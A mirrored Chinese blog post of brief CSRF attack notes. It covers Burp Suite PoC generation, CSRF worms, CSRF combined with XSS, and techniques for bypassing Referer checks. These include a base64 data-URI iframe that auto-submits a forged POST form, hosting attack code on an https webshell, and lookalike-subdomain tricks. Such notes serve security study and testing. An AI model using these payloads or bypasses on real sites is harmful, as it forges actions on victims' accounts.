zoukankan      html  css  js  c++  java
  • csrf-bugbank咖面Flx

    自动化生成poc

    • burpsuite

    CSRF使用方法

    • POST
    • Burpsuite生成poc-->js代码提交

    JSON劫持攻击

    CSRF蠕虫

    flash CSRF

    csrf+xss组合拳

    CSRF绕过referer

    1.Refere为空条件下
    - 利用ftp://,http://,https://,file://,javascript:,data:
    这个时候浏览器地址栏是file://开头的,如果这个HTML页面向任何http站点提交请求的话,这些请求的Referer都是空的。

    <html>
        <body>
           <iframe src="data:text/html;base64,PGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPWh0dHA6Ly9hLmIuY29tL2Q+PGlucHV0IHR5cGU9dGV4dCBuYW1lPSdpZCcgdmFsdWU9JzEyMycvPjwvZm9ybT48c2NyaXB0PmRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOzwvc2NyaXB0Pg==">
        </body> 
    </html>
    
    -   利用https协议  https向http跳转的时候Referer为空
    

    拿一个https的webshell
    <iframe src="https://xxxxx.xxxxx/attack.php">
    attack.php写上CSRF攻击代码
    2.判断Referer是某域情况下绕过
    比如你找的csrf是xxx.com 验证的referer是验证的*.xx.com 可以找个二级域名 之后<img "csrf地址"> 之后在把文章地址发出去 就可以伪造。
    3.判断Referer是否存在某关键词
    referer判断存在不存在google.com这个关键词
    在网站新建一个google.com目录 把CSRF存放在google.com目录,即可绕过
    4.判断referer是否有某域名
    判断了Referer开头是否以126.com以及126子域名 不验证根域名为126.com 那么我这里可以构造子域名x.126.com.xxx.com作为蠕虫传播的载体服务器,即可绕过。

  • 相关阅读:
    hlgoj 1766 Cubing
    Reverse Linked List
    String to Integer
    Bitwise AND of Numbers Range
    Best Time to Buy and Sell Stock III
    First Missing Positive
    Permutation Sequence
    Next Permutation
    Gray Code
    Number of Islands
  • 原文地址:https://www.cnblogs.com/l0nmar/p/12822205.html
Copyright © 2011-2022 走看看